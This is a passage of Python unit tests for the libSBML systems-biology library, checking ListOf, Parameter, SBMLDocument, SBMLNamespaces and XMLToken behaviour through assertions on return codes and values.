lo.append(sp) lo.append(sp) lo.append(sp) lo.append(sp) self.assert_( lo.size() == 5 ) elem = lo.remove(0) _dummyList = [ elem ]; _dummyList[:] = []; del _dummyList elem = lo.remove(0) _dummyList = [ elem ]; _dummyList[:] = []; del _dummyList elem = lo.remove(0) _dummyList = [ elem ]; _dummyList[:] = []; del _dummyList elem = lo.remove(0) _dummyList = [ elem ]; _dummyList[:] = []; del _dummyList elem = lo.remove(0) _dummyList = [ elem ]; _dummyList[:] = []; del _dummyList self.assert_( lo.size() == 0 ) lo.append(sp) lo.append(sp) lo.append(sp) lo.append(sp) lo.appendAndOwn(sp) self.assert_( lo.size() == 5 ) _dummyList = [ lo ]; _dummyList[:] = []; del _dummyList pass def suite(): suite = unittest.TestSuite() suite.addTest(unittest.makeSuite(TestListOf)) return suite if __name__ == "__main__": if unittest.TextTestRunner(verbosity=1).run(suite()).wasSuccessful() : sys.exit(0) else: sys.exit(1) ``` #### File: test/sbml/TestParameter_newSetters.py ```python import sys import unittest import libsbml class TestParameter_newSetters(unittest.TestCase): global P P = None def setUp(self): self.P = libsbml.Parameter(1,2) if (self.P == None): pass pass def tearDown(self): _dummyList = [ self.P ]; _dummyList[:] = []; del _dummyList pass def test_Parameter_setConstant1(self): i = self.P.setConstant(False) self.assert_( i == libsbml.LIBSBML_UNEXPECTED_ATTRIBUTE ) self.assert_( self.P.getConstant() == False ) pass def test_Parameter_setConstant2(self): p = libsbml.Parameter(2,2) i = p.setConstant(False) self.assert_( i == libsbml.LIBSBML_OPERATION_SUCCESS ) self.assert_( p.getConstant() == False ) _dummyList = [ p ]; _dummyList[:] = []; del _dummyList pass def test_Parameter_setId1(self): i = self.P.setId( "1cell") self.assert_( i == libsbml.LIBSBML_INVALID_ATTRIBUTE_VALUE ) self.assertEqual( False, self.P.isSetId() ) pass def test_Parameter_setId2(self): i = self.P.setId( "cell") self.assert_( i == libsbml.LIBSBML_OPERATION_SUCCESS ) self.assertEqual( True, self.P.isSetId() ) self.assert_(( "cell" == self.P.getId() )) i = self.P.setId("") self.assert_( i == libsbml.LIBSBML_OPERATION_SUCCESS ) self.assertEqual( False, self.P.isSetId() ) pass def test_Parameter_setName1(self): i = self.P.setName( "cell") self.assert_( i == libsbml.LIBSBML_OPERATION_SUCCESS ) self.assertEqual( True, self.P.isSetName() ) i = self.P.unsetName() self.assert_( i == libsbml.LIBSBML_OPERATION_SUCCESS ) self.assertEqual( False, self.P.isSetName() ) pass def test_Parameter_setName2(self): p = libsbml.Parameter(2,2) i = p.setName( "1cell") self.assert_( i == libsbml.LIBSBML_OPERATION_SUCCESS ) self.assertEqual( True, p.isSetName() ) i = p.unsetName() self.assert_( i == libsbml.LIBSBML_OPERATION_SUCCESS ) self.assertEqual( False, p.isSetName() ) _dummyList = [ p ]; _dummyList[:] = []; del _dummyList pass def test_Parameter_setName3(self): p = libsbml.Parameter(1,2) i = p.setName( "11pp") self.assert_( i == libsbml.LIBSBML_INVALID_ATTRIBUTE_VALUE ) self.assertEqual( False, p.isSetName() ) i = p.setName("") self.assert_( i == libsbml.LIBSBML_OPERATION_SUCCESS ) self.assertEqual( False, p.isSetName() ) _dummyList = [ p ]; _dummyList[:] = []; del _dummyList pass def test_Parameter_setUnits1(self): i = self.P.setUnits( "1cell") self.assert_( i == libsbml.LIBSBML_INVALID_ATTRIBUTE_VALUE ) self.assertEqual( False, self.P.isSetUnits() ) i = self.P.unsetUnits() self.assert_( i == libsbml.LIBSBML_OPERATION_SUCCESS ) self.assertEqual( False, self.P.isSetUnits() ) pass def test_Parameter_setUnits2(self): i = self.P.setUnits( "litre") self.assert_( i == libsbml.LIBSBML_OPERATION_SUCCESS ) self.assertEqual( True, self.P.isSetUnits() ) i = self.P.unsetUnits() self.assert_( i == libsbml.LIBSBML_OPERATION_SUCCESS ) self.assertEqual( False, self.P.isSetUnits() ) pass def test_Parameter_setUnits3(self): i = self.P.setUnits("") self.assert_( i == libsbml.LIBSBML_OPERATION_SUCCESS ) self.assertEqual( False, self.P.isSetUnits() ) pass def test_Parameter_setValue1(self): i = self.P.setValue(2.0) self.assert_( i == libsbml.LIBSBML_OPERATION_SUCCESS ) self.assert_( self.P.getValue() == 2.0 ) self.assertEqual( True, self.P.isSetValue() ) i = self.P.unsetValue() self.assert_( i == libsbml.LIBSBML_OPERATION_SUCCESS ) self.assertEqual( False, self.P.isSetValue() ) pass def test_Parameter_setValue2(self): p = libsbml.Parameter(2,2) i = p.unsetValue() self.assert_( i == libsbml.LIBSBML_OPERATION_SUCCESS ) self.assertEqual( False, p.isSetValue() ) _dummyList = [ p ]; _dummyList[:] = []; del _dummyList pass def suite(): suite = unittest.TestSuite() suite.addTest(unittest.makeSuite(TestParameter_newSetters)) return suite if __name__ == "__main__": if unittest.TextTestRunner(verbosity=1).run(suite()).wasSuccessful() : sys.exit(0) else: sys.exit(1) ``` #### File: test/sbml/TestReadFromFile1.py ```python import sys import unittest import libsbml class TestReadFromFile1(unittest.TestCase): def test_read_l1v1_branch(self): filename = "../../sbml/test/test-data/l1v1-branch.xml" d = libsbml.readSBML(filename) if (d == None): pass self.assert_( d.getLevel() == 1 ) self.assert_( d.getVersion() == 1 ) m = d.getModel() self.assert_(( "Branch" == m.getName() )) self.assert_( m.getNumCompartments() == 1 ) c = m.getCompartment(0) self.assert_(( "compartmentOne" == c.getName() )) self.assert_( c.getVolume() == 1 ) ud = c.getDerivedUnitDefinition() self.assert_( ud.getNumUnits() == 1 ) self.assert_( ud.getUnit(0).getKind() == libsbml.UNIT_KIND_LITRE ) self.assert_( m.getNumSpecies() == 4 ) s = m.getSpecies(0) self.assert_(( "S1" == s.getName() )) self.assert_(( "compartmentOne" == s.getCompartment() )) self.assert_( s.getInitialAmount() == 0 ) self.assert_( s.getBoundaryCondition() == False ) ud = s.getDerivedUnitDefinition() self.assert_( ud.getNumUnits() == 2 ) self.assert_( ud.getUnit(0).getKind() == libsbml.UNIT_KIND_MOLE ) self.assert_( ud.getUnit(0).getExponent() == 1 ) self.assert_( ud.getUnit(1).getKind() == libsbml.UNIT_KIND_LITRE ) self.assert_( ud.getUnit(1).getExponent() == -1 ) s = m.getSpecies(1) self.assert_(( "X0" == s.getName() )) self.assert_(( "compartmentOne" == s.getCompartment() )) self.assert_( s.getInitialAmount() == 0 ) self.assert_( s.getBoundaryCondition() == True ) s = m.getSpecies(2) self.assert_(( "X1" == s.getName() )) self.assert_(( "compartmentOne" == s.getCompartment() )) self.assert_( s.getInitialAmount() == 0 ) self.assert_( s.getBoundaryCondition() == True ) s = m.getSpecies(3) self.assert_(( "X2" == s.getName() )) self.assert_(( "compartmentOne" == s.getCompartment() )) self.assert_( s.getInitialAmount() == 0 ) self.assert_( s.getBoundaryCondition() == True ) self.assert_( m.getNumReactions() == 3 ) r = m.getReaction(0) self.assert_(( "reaction_1" == r.getName() )) self.assert_( r.getReversible() == False ) self.assert_( r.getFast() == False ) ud = r.getKineticLaw().getDerivedUnitDefinition() self.assert_( ud.getNumUnits() == 2 ) self.assert_( ud.getUnit(0).getKind() == libsbml.UNIT_KIND_MOLE ) self.assert_( ud.getUnit(0).getExponent() == 1 ) self.assert_( ud.getUnit(1).getKind() == libsbml.UNIT_KIND_LITRE ) self.assert_( ud.getUnit(1).getExponent() == -1 ) self.assert_( r.getKineticLaw().containsUndeclaredUnits() == True ) r = m.getReaction(1) self.assert_(( "reaction_2" == r.getName() )) self.assert_( r.getReversible() == False ) self.assert_( r.getFast() == False ) r = m.getReaction(2) self.assert_(( "reaction_3" == r.getName() )) self.assert_( r.getReversible() == False ) self.assert_( r.getFast() == False ) r = m.getReaction(0) self.assert_( r.getNumReactants() == 1 ) self.assert_( r.getNumProducts() == 1 ) sr = r.getReactant(0) self.assert_(( "X0" == sr.getSpecies() )) self.assert_( sr.getStoichiometry() == 1 ) self.assert_( sr.getDenominator() == 1 ) sr = r.getProduct(0) self.assert_(( "S1" == sr.getSpecies() )) self.assert_( sr.getStoichiometry() == 1 ) self.assert_( sr.getDenominator() == 1 ) kl = r.getKineticLaw() self.assert_(( "k1 * X0" == kl.getFormula() )) self.assert_( kl.getNumParameters() == 1 ) p = kl.getParameter(0) self.assert_(( "k1" == p.getName() )) self.assert_( p.getValue() == 0 ) r = m.getReaction(1) self.assert_( r.getNumReactants() == 1 ) self.assert_( r.getNumProducts() == 1 ) sr = r.getReactant(0) self.assert_(( "S1" == sr.getSpecies() )) self.assert_( sr.getStoichiometry() == 1 ) self.assert_( sr.getDenominator() == 1 ) sr = r.getProduct(0) self.assert_(( "X1" == sr.getSpecies() )) self.assert_( sr.getStoichiometry() == 1 ) self.assert_( sr.getDenominator() == 1 ) kl = r.getKineticLaw() self.assert_(( "k2 * S1" == kl.getFormula() )) self.assert_( kl.getNumParameters() == 1 ) p = kl.getParameter(0) self.assert_(( "k2" == p.getName() )) self.assert_( p.getValue() == 0 ) r = m.getReaction(2) self.assert_( r.getNumReactants() == 1 ) self.assert_( r.getNumProducts() == 1 ) sr = r.getReactant(0) self.assert_(( "S1" == sr.getSpecies() )) self.assert_( sr.getStoichiometry() == 1 ) self.assert_( sr.getDenominator() == 1 ) sr = r.getProduct(0) self.assert_(( "X2" == sr.getSpecies() )) self.assert_( sr.getStoichiometry() == 1 ) self.assert_( sr.getDenominator() == 1 ) kl = r.getKineticLaw() self.assert_(( "k3 * S1" == kl.getFormula() )) self.assert_( kl.getNumParameters() == 1 ) p = kl.getParameter(0) self.assert_(( "k3" == p.getName() )) self.assert_( p.getValue() == 0 ) _dummyList = [ d ]; _dummyList[:] = []; del _dummyList pass def suite(): suite = unittest.TestSuite() suite.addTest(unittest.makeSuite(TestReadFromFile1)) return suite if __name__ == "__main__": if unittest.TextTestRunner(verbosity=1).run(suite()).wasSuccessful() : sys.exit(0) else: sys.exit(1) ``` #### File: test/sbml/TestSBMLDocument.py ```python import sys import unittest import libsbml class TestSBMLDocument(unittest.TestCase): def test_SBMLDocument_create(self): d = libsbml.SBMLDocument() self.assert_( d.getTypeCode() == libsbml.SBML_DOCUMENT ) self.assert_( d.getNotes() == None ) self.assert_( d.getAnnotation() == None ) self.assert_( d.getLevel() == 3 ) self.assert_( d.getVersion() == 1 ) self.assert_( d.getNumErrors() == 0 ) _dummyList = [ d ]; _dummyList[:] = []; del _dummyList pass def test_SBMLDocument_createWith(self): d = libsbml.SBMLDocument(1,2) self.assert_( d.getTypeCode() == libsbml.SBML_DOCUMENT ) self.assert_( d.getNotes() == None ) self.assert_( d.getAnnotation() == None ) self.assert_( d.getLevel() == 1 ) self.assert_( d.getVersion() == 2 ) self.assert_( d.getNumErrors() == 0 ) _dummyList = [ d ]; _dummyList[:] = []; del _dummyList pass def test_SBMLDocument_free_NULL(self): _dummyList = [ None ]; _dummyList[:] = []; del _dummyList pass def test_SBMLDocument_setLevelAndVersion(self): d = libsbml.SBMLDocument(2,2) m1 = libsbml.Model(2,2) d.setModel(m1) self.assert_( d.setLevelAndVersion(2,3,False) == True ) self.assert_( d.setLevelAndVersion(2,1,False) == True ) self.assert_( d.setLevelAndVersion(1,2,False) == True ) self.assert_( d.setLevelAndVersion(1,1,False) == False ) _dummyList = [ d ]; _dummyList[:] = []; del _dummyList pass def test_SBMLDocument_setLevelAndVersion_Error(self): d = libsbml.SBMLDocument() d.setLevelAndVersion(2,1,True) m1 = libsbml.Model(2,1) u = libsbml.Unit(2,1) u.setKind(libsbml.UnitKind_forName("mole")) u.setOffset(3.2) ud = libsbml.UnitDefinition(2,1) ud.setId( "ud") ud.addUnit(u) m1.addUnitDefinition(ud) d.setModel(m1) self.assert_( d.setLevelAndVersion(2,2,True) == False ) self.assert_( d.setLevelAndVersion(2,3,True) == False ) self.assert_( d.setLevelAndVersion(1,2,True) == False ) self.assert_( d.setLevelAndVersion(1,1,True) == False ) _dummyList = [ d ]; _dummyList[:] = []; del _dummyList pass def test_SBMLDocument_setLevelAndVersion_UnitsError(self): d = libsbml.SBMLDocument() d.setLevelAndVersion(2,4,False) m1 = d.createModel() c = m1.createCompartment() c.setId( "c") p = m1.createParameter() p.setId( "p") p.setUnits( "mole") r = m1.createAssignmentRule() r.setVariable( "c") r.setFormula( "p*p") self.assert_( d.setLevelAndVersion(2,2,False) == True ) self.assert_( d.setLevelAndVersion(2,3,False) == True ) self.assert_( d.setLevelAndVersion(1,2,False) == True ) self.assert_( d.setLevelAndVersion(1,1,False) == False ) _dummyList = [ d ]; _dummyList[:] = []; del _dummyList pass def test_SBMLDocument_setLevelAndVersion_Warning(self): d = libsbml.SBMLDocument(2,2) m1 = libsbml.Model(2,2) (m1).setSBOTerm(2) d.setModel(m1) self.assert_( d.setLevelAndVersion(2,3,False) == True ) self.assert_( d.setLevelAndVersion(2,1,False) == True ) self.assert_( d.setLevelAndVersion(1,2,False) == True ) self.assert_( d.setLevelAndVersion(1,1,False) == False ) _dummyList = [ d ]; _dummyList[:] = []; del _dummyList pass def test_SBMLDocument_setModel(self): d = libsbml.SBMLDocument(2,4) m1 = libsbml.Model(2,4) m2 = libsbml.Model(2,4) self.assert_( d.getModel() == None ) i = d.setModel(m1) self.assert_( i == libsbml.LIBSBML_OPERATION_SUCCESS ) mout = d.getModel() self.assert_( mout != None ) self.assert_( mout != m1 ) i = d.setModel(d.getModel()) self.assert_( i == libsbml.LIBSBML_OPERATION_SUCCESS ) mout = d.getModel() self.assert_( mout != None ) self.assert_( mout != m1 ) i = d.setModel(m2) self.assert_( i == libsbml.LIBSBML_OPERATION_SUCCESS ) mout = d.getModel() self.assert_( mout != None ) self.assert_( mout != m2 ) _dummyList = [ d ]; _dummyList[:] = []; del _dummyList pass def test_SBMLDocument_setModel1(self): d = libsbml.SBMLDocument(2,2) m1 = libsbml.Model(2,1) i = d.setModel(m1) self.assert_( i == libsbml.LIBSBML_VERSION_MISMATCH ) self.assert_( d.getModel() == None ) _dummyList = [ d ]; _dummyList[:] = []; del _dummyList pass def test_SBMLDocument_setModel2(self): d = libsbml.SBMLDocument(2,2) m1 = libsbml.Model(1,2) m1.createCompartment() i = d.setModel(m1) self.assert_( i == libsbml.LIBSBML_LEVEL_MISMATCH ) self.assert_( d.getModel() == None ) _dummyList = [ d ]; _dummyList[:] = []; del _dummyList pass def test_SBMLDocument_setModel3(self): d = libsbml.SBMLDocument(2,2) m1 = libsbml.Model(2,2) i = d.setModel(m1) self.assert_( i == libsbml.LIBSBML_OPERATION_SUCCESS ) self.assert_( d.getModel() != None ) _dummyList = [ d ]; _dummyList[:] = []; del _dummyList pass def suite(): suite = unittest.TestSuite() suite.addTest(unittest.makeSuite(TestSBMLDocument)) return suite if __name__ == "__main__": if unittest.TextTestRunner(verbosity=1).run(suite()).wasSuccessful() : sys.exit(0) else: sys.exit(1) ``` #### File: test/sbml/TestSBMLNamespaces.py ```python import sys import unittest import libsbml class TestSBMLNamespaces(unittest.TestCase): def test_SBMLNamespaces_L1V1(self): sbml = libsbml.SBMLNamespaces(1,1) self.assert_( sbml.getLevel() == 1 ) self.assert_( sbml.getVersion() == 1 ) ns = sbml.getNamespaces() self.assert_( ns.getLength() == 1 ) self.assert_( ns.getURI(0) == "http://www.sbml.org/sbml/level1" ) self.assert_( ns.getPrefix(0) == "" ) sbml = None pass def test_SBMLNamespaces_L1V2(self): sbml = libsbml.SBMLNamespaces(1,2) self.assert_( sbml.getLevel() == 1 ) self.assert_( sbml.getVersion() == 2 ) ns = sbml.getNamespaces() self.assert_( ns.getLength() == 1 ) self.assert_( ns.getURI(0) == "http://www.sbml.org/sbml/level1" ) self.assert_( ns.getPrefix(0) == "" ) sbml = None pass def test_SBMLNamespaces_L2V1(self): sbml = libsbml.SBMLNamespaces(2,1) self.assert_( sbml.getLevel() == 2 ) self.assert_( sbml.getVersion() == 1 ) ns = sbml.getNamespaces() self.assert_( ns.getLength() == 1 ) self.assert_( ns.getURI(0) == "http://www.sbml.org/sbml/level2" ) self.assert_( ns.getPrefix(0) == "" ) sbml = None pass def test_SBMLNamespaces_L2V2(self): sbml = libsbml.SBMLNamespaces(2,2) self.assert_( sbml.getLevel() == 2 ) self.assert_( sbml.getVersion() == 2 ) ns = sbml.getNamespaces() self.assert_( ns.getLength() == 1 ) self.assert_( ns.getURI(0) == "http://www.sbml.org/sbml/level2/version2" ) self.assert_( ns.getPrefix(0) == "" ) sbml = None pass def test_SBMLNamespaces_L2V3(self): sbml = libsbml.SBMLNamespaces(2,3) self.assert_( sbml.getLevel() == 2 ) self.assert_( sbml.getVersion() == 3 ) ns = sbml.getNamespaces() self.assert_( ns.getLength() == 1 ) self.assert_( ns.getURI(0) == "http://www.sbml.org/sbml/level2/version3" ) self.assert_( ns.getPrefix(0) == "" ) sbml = None pass def test_SBMLNamespaces_L2V4(self): sbml = libsbml.SBMLNamespaces(2,4) self.assert_( sbml.getLevel() == 2 ) self.assert_( sbml.getVersion() == 4 ) ns = sbml.getNamespaces() self.assert_( ns.getLength() == 1 ) self.assert_( ns.getURI(0) == "http://www.sbml.org/sbml/level2/version4" ) self.assert_( ns.getPrefix(0) == "" ) sbml = None pass def test_SBMLNamespaces_L3V1(self): sbml = libsbml.SBMLNamespaces(3,1) self.assert_( sbml.getLevel() == 3 ) self.assert_( sbml.getVersion() == 1 ) ns = sbml.getNamespaces() self.assert_( ns.getLength() == 1 ) self.assert_( ns.getURI(0) == "http://www.sbml.org/sbml/level3/version1/core" ) self.assert_( ns.getPrefix(0) == "" ) sbml = None pass def test_SBMLNamespaces_add_and_remove_namespaces(self): sbmlns = libsbml.SBMLNamespaces( 3,1 ) self.assert_( sbmlns.getLevel() == 3 ) self.assert_( sbmlns.getVersion() == 1 ) sbmlns.addNamespace("http://www.sbml.org/sbml/level3/version1/group/version1", "group") sbmlns.addNamespace("http://www.sbml.org/sbml/level3/version1/layout/version1", "layout") sbmlns.addNamespace("http://www.sbml.org/sbml/level3/version1/render/version1", "render") sbmlns.addNamespace("http://www.sbml.org/sbml/level3/version1/multi/version1", "multi") ns = sbmlns.getNamespaces() self.assert_( ns.getLength() == 5 ) self.assert_( ns.getURI(0) == "http://www.sbml.org/sbml/level3/version1/core" ) self.assert_( ns.getPrefix(0) == "" ) self.assert_( ns.getURI(1) == "http://www.sbml.org/sbml/level3/version1/group/version1" ) self.assert_( ns.getPrefix(1) == "group" ) self.assert_( ns.getURI(2) == "http://www.sbml.org/sbml/level3/version1/layout/version1" ) self.assert_( ns.getPrefix(2) == "layout" ) self.assert_( ns.getURI(3) == "http://www.sbml.org/sbml/level3/version1/render/version1" ) self.assert_( ns.getPrefix(3) == "render" ) self.assert_( ns.getURI(4) == "http://www.sbml.org/sbml/level3/version1/multi/version1" ) self.assert_( ns.getPrefix(4) == "multi" ) sbmlns.removeNamespace("http://www.sbml.org/sbml/level3/version1/layout/version1") sbmlns.removeNamespace("http://www.sbml.org/sbml/level3/version1/group/version1") sbmlns.removeNamespace("http://www.sbml.org/sbml/level3/version1/render/version1") sbmlns.removeNamespace("http://www.sbml.org/sbml/level3/version1/multi/version1") pass def test_SBMLNamespaces_getURI(self): self.assert_( libsbml.SBMLNamespaces.getSBMLNamespaceURI(1,1) == "http://www.sbml.org/sbml/level1" ) self.assert_( libsbml.SBMLNamespaces.getSBMLNamespaceURI(1,2) == "http://www.sbml.org/sbml/level1" ) self.assert_( libsbml.SBMLNamespaces.getSBMLNamespaceURI(2,1) == "http://www.sbml.org/sbml/level2" ) self.assert_( libsbml.SBMLNamespaces.getSBMLNamespaceURI(2,2) == "http://www.sbml.org/sbml/level2/version2" ) self.assert_( libsbml.SBMLNamespaces.getSBMLNamespaceURI(2,3) == "http://www.sbml.org/sbml/level2/version3" ) self.assert_( libsbml.SBMLNamespaces.getSBMLNamespaceURI(2,4) == "http://www.sbml.org/sbml/level2/version4" ) self.assert_( libsbml.SBMLNamespaces.getSBMLNamespaceURI(3,1) == "http://www.sbml.org/sbml/level3/version1/core" ) pass def suite(): suite = unittest.TestSuite() suite.addTest(unittest.makeSuite(TestSBMLNamespaces)) return suite if __name__ == "__main__": if unittest.TextTestRunner(verbosity=1).run(suite()).wasSuccessful() : sys.exit(0) else: sys.exit(1) ``` #### File: test/xml/TestXMLToken_newSetters.py ```python import sys import unittest import libsbml class TestXMLToken_newSetters(unittest.TestCase): def test_XMLToken_newSetters_addAttributes1(self): triple = libsbml.XMLTriple("test","","") attr = libsbml.XMLAttributes() token = libsbml.XMLToken(triple,attr) xt2 = libsbml.XMLTriple("name3", "http://name3.org/", "p3") i = token.addAttr( "name1", "val1") self.assert_( i == libsbml.LIBSBML_OPERATION_SUCCESS ) self.assert_( token.getAttributesLength() == 1 ) self.assert_( token.isAttributesEmpty() == False ) self.assert_( ( "name1" != token.getAttrName(0) ) == False ) self.assert_( ( "val1" != token.getAttrValue(0) ) == False ) i = token.addAttr( "name2", "val2", "http://name1.org/", "p1") self.assert_( i == libsbml.LIBSBML_OPERATION_SUCCESS ) self.assert_( token.getAttributesLength() == 2 ) self.assert_( token.isAttributesEmpty() == False ) self.assert_( ( "name2" != token.getAttrName(1) ) == False ) self.assert_( ( "val2" != token.getAttrValue(1) ) == False ) self.assert_( ( "http://name1.org/" != token.getAttrURI(1) ) == False ) self.assert_( ( "p1" != token.getAttrPrefix(1) ) == False ) i = token.addAttr(xt2, "val2") self.assert_( i == libsbml.LIBSBML_OPERATION_SUCCESS ) self.assert_( token.getAttributesLength() == 3 ) self.assert_( token.isAttributesEmpty() == False ) self.assert_( ( "name3" != token.getAttrName(2) ) == False ) self.assert_( ( "val2" != token.getAttrValue(2) ) == False ) self.assert_( ( "http://name3.org/" != token.getAttrURI(2) ) == False ) self.assert_( ( "p3" != token.getAttrPrefix(2) ) == False ) _dummyList = [ xt2 ]; _dummyList[:] = []; del _dummyList _dummyList = [ triple ]; _dummyList[:] = []; del _dummyList _dummyList = [ attr ]; _dummyList[:] = []; del _dummyList _dummyList = [ token ]; _dummyList[:] = []; del _dummyList pass def test_XMLToken_newSetters_addAttributes2(self): triple = libsbml.XMLTriple("test","","") token = libsbml.XMLToken(triple) xt2 = libsbml.XMLTriple("name3", "http://name3.org/", "p3") i = token.addAttr( "name1", "val1") self.assert_( i == libsbml.LIBSBML_INVALID_XML_OPERATION ) self.assert_( token.getAttributesLength() == 0 ) self.assert_( token.isAttributesEmpty() == True ) i = token.addAttr( "name2", "val2", "http://name1.org/", "p1") self.assert_( i == libsbml.LIBSBML_INVALID_XML_OPERATION ) self.assert_( token.getAttributesLength() == 0 ) self.assert_( token.isAttributesEmpty() == True ) i = token.addAttr(xt2, "val2") self.assert_( i == libsbml.LIBSBML_INVALID_XML_OPERATION ) self.assert_( token.getAttributesLength() == 0 ) self.assert_( token.isAttributesEmpty() == True ) _dummyList = [ xt2 ]; _dummyList[:] = []; del _dummyList _dummyList = [ triple ]; _dummyList[:] = []; del _dummyList _dummyList = [ token ]; _dummyList[:] = []; del _dummyList pass def test_XMLToken_newSetters_addNamespaces1(self): triple = libsbml.XMLTriple("test","","") attr = libsbml.XMLAttributes() token = libsbml.XMLToken(triple,attr) self.assert_( token.getNamespacesLength() == 0 ) self.assert_( token.isNamespacesEmpty() == True ) i = token.addNamespace( "http://test1.org/", "test1") self.assert_( i == libsbml.LIBSBML_OPERATION_SUCCESS ) self.assert_( token.getNamespacesLength() == 1 ) self.assert_( token.isNamespacesEmpty() == False ) _dummyList = [ attr ]; _dummyList[:] = []; del _dummyList _dummyList = [ triple ]; _dummyList[:] = []; del _dummyList _dummyList = [ token ]; _dummyList[:] = []; del _dummyList pass def test_XMLToken_newSetters_addNamespaces2(self): triple = libsbml.XMLTriple("test","","") token = libsbml.XMLToken(triple) self.assert_( token.getNamespacesLength() == 0 ) self.assert_( token.isNamespacesEmpty() == True ) i = token.addNamespace( "http://test1.org/", "test1") self.assert_( i == libsbml.LIBSBML_INVALID_XML_OPERATION ) self.assert_( token.getNamespacesLength() == 0 ) self.assert_( token.isNamespacesEmpty() == True ) _dummyList = [ triple ]; _dummyList[:] = []; del _dummyList _dummyList = [ token ]; _dummyList[:] = []; del _dummyList pass def test_XMLToken_newSetters_clearAttributes1(self): triple = libsbml.XMLTriple("test","","") attr = libsbml.XMLAttributes() token = libsbml.XMLToken(triple,attr) nattr = libsbml.XMLAttributes() xt1 = libsbml.XMLTriple("name1", "http://name1.org/", "p1") nattr.add(xt1, "val1") i = token.setAttributes(nattr) self.assert_( i == libsbml.LIBSBML_OPERATION_SUCCESS ) self.assert_( token.isAttributesEmpty() == False ) i = token.clearAttributes() self.assert_( i == libsbml.LIBSBML_OPERATION_SUCCESS ) self.assert_( token.isAttributesEmpty() == True ) _dummyList = [ nattr ]; _dummyList[:] = []; del _dummyList _dummyList = [ attr ]; _dummyList[:] = []; del _dummyList _dummyList = [ triple ]; _dummyList[:] = []; del _dummyList _dummyList = [ token ]; _dummyList[:] = []; del _dummyList _dummyList = [ xt1 ]; _dummyList[:] = []; del _dummyList pass def test_XMLToken_newSetters_clearNamespaces1(self): triple = libsbml.XMLTriple("test","","") attr = libsbml.XMLAttributes() token = libsbml.XMLToken(triple,attr) ns = libsbml.XMLNamespaces() self.assert_( token.getNamespacesLength() == 0 ) self.assert_( token.isNamespacesEmpty() == True ) ns.add( "http://test1.org/", "test1") i = token.setNamespaces(ns) self.assert_( i == libsbml.LIBSBML_OPERATION_SUCCESS ) self.assert_( token.getNamespacesLength() == 1 ) self.assert_( token.isNamespacesEmpty() == False ) i = token.clearNamespaces() self.assert_( i == libsbml.LIBSBML_OPERATION_SUCCESS ) self.assert_( token.getNamespacesLength() == 0 ) self.assert_( token.isNamespacesEmpty() == True ) _dummyList = [ attr ]; _dummyList[:] = []; del _dummyList _dummyList = [ triple ]; _dummyList[:] = []; del _dummyList _dummyList = [ token ]; _dummyList[:] = []; del _dummyList _dummyList = [ ns ]; _dummyList[:] = []; del _dummyList pass def test_XMLToken_newSetters_removeAttributes1(self): triple = libsbml.XMLTriple("test","","") attr = libsbml.XMLAttributes() token = libsbml.XMLToken(triple,attr) xt2 = libsbml.XMLTriple("name3", "http://name3.org/", "p3") xt1 = libsbml.XMLTriple("name5", "http://name5.org/", "p5") i = token.addAttr( "name1", "val1") i = token.addAttr( "name2", "val2", "http://name1.org/", "p1") i = token.addAttr(xt2, "val2") i = token.addAttr( "name4", "val4") self.assert_( token.getAttributes().getLength() == 4 ) i = token.removeAttr(7) self.assert_( i == libsbml.LIBSBML_INDEX_EXCEEDS_SIZE ) i = token.removeAttr( "name7") self.assert_( i == libsbml.LIBSBML_INDEX_EXCEEDS_SIZE ) i = token.removeAttr( "name7", "namespaces7") self.assert_( i == libsbml.LIBSBML_INDEX_EXCEEDS_SIZE ) i = token.removeAttr(xt1) self.assert_( i == libsbml.LIBSBML_INDEX_EXCEEDS_SIZE ) self.assert_( token.getAttributes().getLength() == 4 ) i = token.removeAttr(3) self.assert_( i == libsbml.LIBSBML_OPERATION_SUCCESS ) self.assert_( token.getAttributes().getLength() == 3 ) i = token.removeAttr( "name1") self.assert_( i == libsbml.LIBSBML_OPERATION_SUCCESS ) self.assert_( token.getAttributes().getLength() == 2 ) i = token.removeAttr( "name2", "http://name1.org/") self.assert_( i == libsbml.LIBSBML_OPERATION_SUCCESS ) self.assert_( token.getAttributes().getLength() == 1 ) i = token.removeAttr(xt2) self.assert_( i == libsbml.LIBSBML_OPERATION_SUCCESS ) self.assert_( token.getAttributes().getLength() == 0 ) _dummyList = [ xt1 ]; _dummyList[:] = []; del _dummyList _dummyList = [ xt2 ]; _dummyList[:] = []; del _dummyList _dummyList = [ triple ]; _dummyList[:] = []; del _dummyList _dummyList = [ attr ]; _dummyList[:] = []; del _dummyList _dummyList = [ token ]; _dummyList[:] = []; del _dummyList pass def test_XMLToken_newSetters_removeNamespaces(self): triple = libsbml.XMLTriple("test","","") attr = libsbml.XMLAttributes() token = libsbml.XMLToken(triple,attr) token.addNamespace( "http://test1.org/", "test1") self.assert_( token.getNamespacesLength() == 1 ) i = token.removeNamespace(4) self.assert_( i == libsbml.LIBSBML_INDEX_EXCEEDS_SIZE ) self.assert_( token.getNamespacesLength() == 1 ) i = token.removeNamespace(0) self.assert_( i == libsbml.LIBSBML_OPERATION_SUCCESS ) self.assert_( token.getNamespacesLength() == 0 ) _dummyList = [ token ]; _dummyList[:] = []; del _dummyList _dummyList = [ triple ]; _dummyList[:] = []; del _dummyList _dummyList = [ attr ]; _dummyList[:] = []; del _dummyList pass def test_XMLToken_newSetters_removeNamespaces1(self): triple = libsbml.XMLTriple("test","","") attr = libsbml.XMLAttributes() token = libsbml.XMLToken(triple,attr) token.addNamespace( "http://test1.org/", "test1") self.assert_( token.getNamespacesLength() == 1 ) i = token.removeNamespace( "test2") self.assert_( i == libsbml.LIBSBML_INDEX_EXCEEDS_SIZE ) self.assert_( token.getNamespacesLength() == 1 ) i = token.removeNamespace( "test1") self.assert_( i == libsbml.LIBSBML_OPERATION_SUCCESS ) self.assert_( token.getNamespacesLength() == 0 ) _dummyList = [ token ]; _dummyList[:] = []; del _dummyList _dummyList = [ triple ]; _dummyList[:] = []; del _dummyList _dummyList = [ attr ]; _dummyList[:] = []; del _dummyList pass def test_XMLToken_newSetters_setAttributes1(self): triple = libsbml.XMLTriple("test","","") attr = libsbml.XMLAttributes() token = libsbml.XMLToken(triple,attr) nattr = libsbml.XMLAttributes() xt1 = libsbml.XMLTriple("name1", "http://name1.org/", "p1") nattr.add(xt1, "val1") i = token.setAttributes(nattr) self.assert_( i == libsbml.LIBSBML_OPERATION_SUCCESS ) self.assert_( token.isAttributesEmpty() == False ) _dummyList = [ nattr ]; _dummyList[:] = []; del _dummyList _dummyList = [ attr ]; _dummyList[:] = []; del _dummyList _dummyList = [ triple ]; _dummyList[:] = []; del _dummyList _dummyList = [ token ]; 